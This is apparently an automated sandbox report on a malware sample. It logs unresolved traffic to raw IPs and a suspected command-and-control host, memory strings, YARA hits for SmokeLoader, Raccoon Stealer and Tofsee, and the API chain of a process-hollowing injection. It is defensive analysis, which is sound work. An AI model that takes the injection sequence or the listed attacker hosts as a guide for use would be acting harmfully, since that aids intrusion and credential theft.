                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.508444702.000002392259A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.508444702.000002392259A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsmgbhufo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49771 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49792 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49863 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49865 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49879 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49883 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 0.2.0Cjy7Lkv1A.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.1.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.ujhcrda.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, type: MEMORY

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.670e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.550e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.eb0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.eb0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.szdcdkt.exe.690000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.a50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.A8FB.exe.570000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A8FB.exe PID: 4692, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: szdcdkt.exe PID: 2972, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6780, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has nameless sectionsShow sources
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: 6674.exe.5.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_004114C1
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_004120FD
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00412E5E
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00411A05
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00410F7D
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040C709
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_0040478E
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00463253
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_004631FF
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402B2E
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00533253
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_005331FF
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_0208160C
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_020815DE
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeCode function: 14_2_020815F6
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: 17_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D896F0
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D80470
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_00D80460
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BCDE18
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC8DF8
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC8DE8
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04BC8658
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04D700F1
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_0040C913
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00A5C913
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 42_2_02D7EC28
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,VirtualAlloc,
                          Source: 0Cjy7Lkv1A.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 0Cjy7Lkv1A.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 0Cjy7Lkv1A.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8008.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8008.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8008.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8B25.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1BCC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1BCC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1BCC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 60C2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 60C2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 60C2.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7063.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7063.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7063.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7063.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A8FB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A8FB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A8FB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A8FB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 382E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 382E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 382E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 382E.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: ujhcrda.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: ujhcrda.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: ujhcrda.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: szdcdkt.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: szdcdkt.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: szdcdkt.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: szdcdkt.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeSection loaded: mscorjit.dll
                          Source: 0Cjy7Lkv1A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\uuqefjyt\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\7063.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: String function: 00404D54 appears 44 times
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 0_2_00460110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
